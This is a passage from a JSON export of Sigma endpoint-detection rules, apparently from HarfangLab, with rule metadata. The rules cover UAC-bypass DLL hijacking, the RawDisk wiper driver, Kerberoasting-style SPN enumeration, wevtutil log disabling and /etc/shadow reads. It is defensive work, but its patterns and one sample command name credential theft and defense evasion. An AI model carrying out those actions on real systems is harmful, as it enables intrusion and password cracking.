"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092900Z",
"creation_date": "2026-03-23T11:45:34.092902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://null-byte.wonderhowto.com/how-to/bypass-uac-using-dll-hijacking-0168600/"
],
"name": "t1548_002_uac_bypass_migwiz_mcx2prov.yml",
"content": "title: UAC Bypass Executed via migwiz and mcx2prov\nid: 6f6e37f2-2f9d-4b37-9d9a-74ed25de6333\ndescription: |\n Detects the migwiz.exe and mcx2prov.exe DLL hijacking UAC bypasses.\n Attackers may bypass UAC mechanisms to elevate process privileges on the system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the origin of the loaded DLL and to analyze its content.\nreferences:\n - https://null-byte.wonderhowto.com/how-to/bypass-uac-using-dll-hijacking-0168600/\ndate: 2020/10/15\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image:\n - '?:\\Windows\\ehome\\mcx2prov.exe'\n - '?:\\Windows\\System32\\migwiz\\migwiz.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\migwiz\\CryptBase.dll'\n - '?:\\Windows\\System32\\migwiz\\CryptSP.dll'\n - '?:\\Windows\\System32\\migwiz\\WdsCore.dll'\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f6e37f2-2f9d-4b37-9d9a-74ed25de6333",
"rule_name": "UAC Bypass Executed via migwiz and mcx2prov",
"rule_description": "Detects the migwiz.exe and mcx2prov.exe DLL hijacking UAC bypasses.\nAttackers may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the origin of the loaded DLL and to analyze its content.\n",
"rule_creation_date": "2020-10-15",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6fcaf0dc-8bb7-4983-9d14-46f71839bbb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609459Z",
"creation_date": "2026-03-23T11:45:34.609462Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609470Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/",
"https://attack.mitre.org/software/S0364/",
"https://attack.mitre.org/techniques/T1561/001/"
],
"name": "t1561_001_rawdsk3_dangerous_driver_loading.yml",
"content": "title: EldoS RawDisk 3 Dangerous Driver Loaded\nid: 6fcaf0dc-8bb7-4983-9d14-46f71839bbb5\ndescription: |\n Detects the loading of the EldoS RawDisk 3 driver.\n This driver has been used in the July 2022 Iranian attacks against the Albanian government in order to wipe drives.\n It is recommended to investigate the activity on the endpoint near the driver loading to identify the process responsible for the driver creation and load.\nreferences:\n - https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/\n - https://attack.mitre.org/software/S0364/\n - https://attack.mitre.org/techniques/T1561/001/\ndate: 2022/09/19\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.s0364\n - attack.impact\n - attack.t1561.001\n - attack.t1561.002\n - attack.t1485\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.Deletion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n - DriverSha256: '3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6'\n - OriginalFileName: 'rawdsk3.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6fcaf0dc-8bb7-4983-9d14-46f71839bbb5",
"rule_name": "EldoS RawDisk 3 Dangerous Driver Loaded",
"rule_description": "Detects the loading of the EldoS RawDisk 3 driver.\nThis driver has been used in the July 2022 Iranian attacks against the Albanian government in order to wipe drives.\nIt is recommended to investigate the activity on the endpoint near the driver loading to identify the process responsible for the driver creation and load.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1485",
"attack.t1561.001",
"attack.t1561.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ff809b3-cedd-40bd-ad93-37e4dc9da8ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.764406Z",
"creation_date": "2026-03-23T11:45:35.294785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294789Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_list_linux.yml",
"content": "title: Cron Jobs Enumerated via Crontab (Linux)\nid: 6ff809b3-cedd-40bd-ad93-37e4dc9da8ab\ndescription: |\n Detects the execution of the crontab command to list all cron jobs.\n An attacker can use the list of cron jobs to inject malicious behavior into unprotected scripts.\n It is recommended to look for other malicious actions taken by the ancestors of crontab and to investigate the execution context to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Crontab\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/crontab'\n CommandLine:\n - 'crontab -l'\n - '/bin/crontab -l'\n - '/usr/bin/crontab -l'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - 'ksh /oradata/'\n - 'ksh /opt/mysql/bin/'\n - 'bash /opt/mysql/bin/'\n - 'ksh /opt/pgsql/bin/'\n - 'bash /opt/pgsql/bin/'\n\n exclusion_plesk:\n ParentImage:\n - '/usr/local/psa/admin/sbin/wrapper'\n - '/usr/local/psa/admin/sbin/crontabmng'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_script:\n - CommandLine|endswith: '/AnsiballZ_cron.py'\n - ParentCommandLine|endswith:\n - '/AnsiballZ_cron.py'\n - '/AnsiballZ_command.py'\n\n exclusion_netbackup:\n GrandparentCommandLine:\n - '/usr/openv/netbackup/bin/bprd'\n - '/usr/openv/netbackup/bin/nbpas'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_puppet_agent:\n - ParentCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet agent '\n - GrandparentCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet agent '\n\n exclusion_timeshift:\n - ParentImage:\n - '/usr/bin/timeshift'\n - '/usr/bin/timeshift-gtk'\n - ParentCommandLine: '/bin/bash -c timeshift --check --scripted'\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_chrootkit:\n - ParentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n\n exclusion_crontabmng:\n - ParentImage: '/opt/psa/admin/bin/crontabmng'\n - 
GrandparentImage: '/opt/psa/admin/bin/crontabmng'\n\n exclusion_insights_client:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_crond:\n - GrandparentCommandLine: '/usr/sbin/crond -n'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_postgres:\n ProcessCommandLine: 'crontab -u postgres -l'\n ProcessCurrentDirectory: '/var/lib/pgcluu/data/'\n\n exclusion_wazuh:\n ProcessImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_ssh:\n - GrandparentImage:\n - '/usr/sbin/sshd'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/local/sbin/sshd'\n - GrandparentImage:\n - '/bin/su'\n - '/usr/bin/su'\n - '/usr/bin/sudo'\n Ancestors|contains:\n - '|/usr/sbin/sshd|'\n - '|/usr/lib/openssh/sshd-session|'\n - '|/usr/local/sbin/sshd|'\n\n # Open Monitoring Distribution (OMD)\n exclusion_omd:\n CurrentDirectory|startswith:\n - '/opt/omd/sites/'\n - '/data/omd/sites/'\n ParentCommandLine: '/bin/bash /omd/sites/*/etc/rc.d/99-crontab status'\n\n exclusion_nagios:\n GrandparentCommandLine|startswith: 'bash -c /usr/local/nagios/libexec/check_'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ff809b3-cedd-40bd-ad93-37e4dc9da8ab",
"rule_name": "Cron Jobs Enumerated via Crontab (Linux)",
"rule_description": "Detects the execution of the crontab command to list all cron jobs.\nAn attacker can use the list of cron jobs to inject malicious behavior into unprotected scripts.\nIt is recommended to look for other malicious actions taken by the ancestors of crontab and to investigate the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7011ac8f-bfbe-4598-b846-eef8d866ebc7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088216Z",
"creation_date": "2026-03-23T11:45:34.088219Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088223Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine",
"https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_acrobat.yml",
"content": "title: DLL Hijacking via Acrobat.exe\nid: 7011ac8f-bfbe-4598-b846-eef8d866ebc7\ndescription: |\n Detects potential Windows DLL Hijacking via Acrobat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by putting a legitimate Acrobat executable alongside a malicious winhttp.dll in RAR or ZIP packages.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine\n - https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/11/17\nmodified: 2025/10/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Acrobat.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith:\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\vcruntime140.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\'\n - '?:\\Program Files\\Adobe\\Reader\\'\n - '?:\\Program Files (x86)\\Adobe\\Reader\\'\n - '?:\\Program Files\\Adobe\\Acrobat *\\Acrobat\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat *\\Acrobat\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '\\Device\\\\*\\Windows\\System32\\'\n - 
'\\Device\\\\*\\Windows\\SysWOW64\\'\n - '\\Device\\\\*\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Software Compatibility Publisher'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7011ac8f-bfbe-4598-b846-eef8d866ebc7",
"rule_name": "DLL Hijacking via Acrobat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Acrobat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by putting a legitimate Acrobat executable alongside a malicious winhttp.dll in RAR or ZIP packages.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-11-17",
"rule_modified_date": "2025-10-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "706756d9-814a-4262-9f40-a8eccb5525a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095440Z",
"creation_date": "2026-03-23T11:45:34.095442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095447Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/_wald0/status/1562871258190348289",
"https://blog.certcube.com/kerberoasting-simplified-attack-and-defense/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1558_003_enumerate_spn_via_dsquery.yml",
"content": "title: Suspicious SPNs Enumeration via Dsquery\nid: 706756d9-814a-4262-9f40-a8eccb5525a8\ndescription: |\n Detects a suspicious Service Principal Names (SPNs) enumeration with dsquery.\n Attackers can extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\n Service Principal Names are used to uniquely identify each instance of a Windows service.\n Dsquery is a Windows legitimate binary that can be used to query Active Directory for gathering information.\n It is recommended to check the parent processes for other suspicious activities.\nreferences:\n - https://twitter.com/_wald0/status/1562871258190348289\n - https://blog.certcube.com/kerberoasting-simplified-attack-and-defense/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.credential_access\n - attack.t1558.003\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_dsquery:\n OriginalFileName: 'dsquery.exe'\n\n # dsquery * -filter \"(&(objectcategory=computer) (servicePrincipalName=*))\" -attr distinguishedName servicePrincipalName\n selection_filter:\n CommandLine|contains:\n - ' -filter '\n - ' /filter '\n\n selection_spn:\n CommandLine|contains|all:\n - 'objectCategory'\n - 'servicePrincipalName'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "706756d9-814a-4262-9f40-a8eccb5525a8",
"rule_name": "Suspicious SPNs Enumeration via Dsquery",
"rule_description": "Detects a suspicious Service Principal Names (SPNs) enumeration with dsquery.\nAttackers can extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\nService Principal Names are used to uniquely identify each instance of a Windows service.\nDsquery is a Windows legitimate binary that can be used to query Active Directory for gathering information.\nIt is recommended to check the parent processes for other suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "706e1b12-c234-4940-a0c9-11a371bfc4c2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073179Z",
"creation_date": "2026-03-23T11:45:34.073181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073185Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4",
"https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_disable_windows_eventlog.yml",
"content": "title: Suspicious Windows Event Logs Manipulation via wevtutil\nid: 706e1b12-c234-4940-a0c9-11a371bfc4c2\ndescription: |\n Detects when one of the Windows Event Logs is disabled or its maximum size is modified (e.g. reduced) via wevtutil.\n This technique is sometimes used by attackers to hide their malicious activities.\n It is recommended to investigate the process responsible for the execution of wevtutil and to look for other suspicious actions on the host.\n If this activity is legitimate and recurrent in your environment, it is recommended to whitelist the processes or scripts responsible for this activity.\nreferences:\n - https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4\n - https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2022/12/15\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wevtutil.exe'\n - OriginalFileName: 'wevtutil.exe'\n\n selection_action:\n CommandLine|contains:\n - ' set-log '\n - ' sl '\n\n selection_args:\n CommandLine|contains:\n - '?e:false' # Disabling\n - '?enabled:false' # Disabling\n - '?ms:' # Size reduction\n\n condition: all of selection_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "706e1b12-c234-4940-a0c9-11a371bfc4c2",
"rule_name": "Suspicious Windows Event Logs Manipulation via wevtutil",
"rule_description": "Detects when one of the Windows Event Logs is disabled or its maximum size is modified (e.g. reduced) via wevtutil.\nThis technique is sometimes used by attackers to hide their malicious activities.\nIt is recommended to investigate the process responsible for the execution of wevtutil and to look for other suspicious actions on the host.\nIf this activity is legitimate and recurrent in your environment, it is recommended to whitelist the processes or scripts responsible for this activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70a2410f-7713-47f6-aebd-e7a300dd5add",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294753Z",
"creation_date": "2026-03-23T11:45:35.294756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294761Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_accessed_cli.yml",
"content": "title: File /etc/shadow Accessed via Command-line\nid: 70a2410f-7713-47f6-aebd-e7a300dd5add\ndescription: |\n Detects a suspicious attempt to access /etc/shadow from the command-line using common file viewing or copying utilities.\n This file contains the hashed passwords of all local accounts on the system.\n The content of this file is often used to gather information about the system and for offline password cracking.\n It is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\n If this activity comes from legitimate software in your environment and is recurrent, it is highly recommended to whitelist the offending processes.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2021/09/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '/etc/shadow'\n Image|endswith:\n - '/cat'\n - '/less'\n - '/more'\n - '/vi'\n - '/vim.basic'\n - '/vim.tiny'\n - '/cp'\n - '/rsync'\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_debian_backup:\n CommandLine: 'cp -p /etc/shadow shadow.bak'\n CurrentDirectory:\n - '/var/backups'\n - '/var/backups/'\n ParentCommandLine: '/bin/sh /etc/cron.daily/passwd'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis *'\n - '/bin/sh /usr/sbin/lynis *'\n - '/usr/bin/sh /usr/bin/lynis *'\n\n exclusion_osconfexec:\n ParentCommandLine:\n - '/bin/sh ./osconf.sh setpassword *'\n - './osconfexec 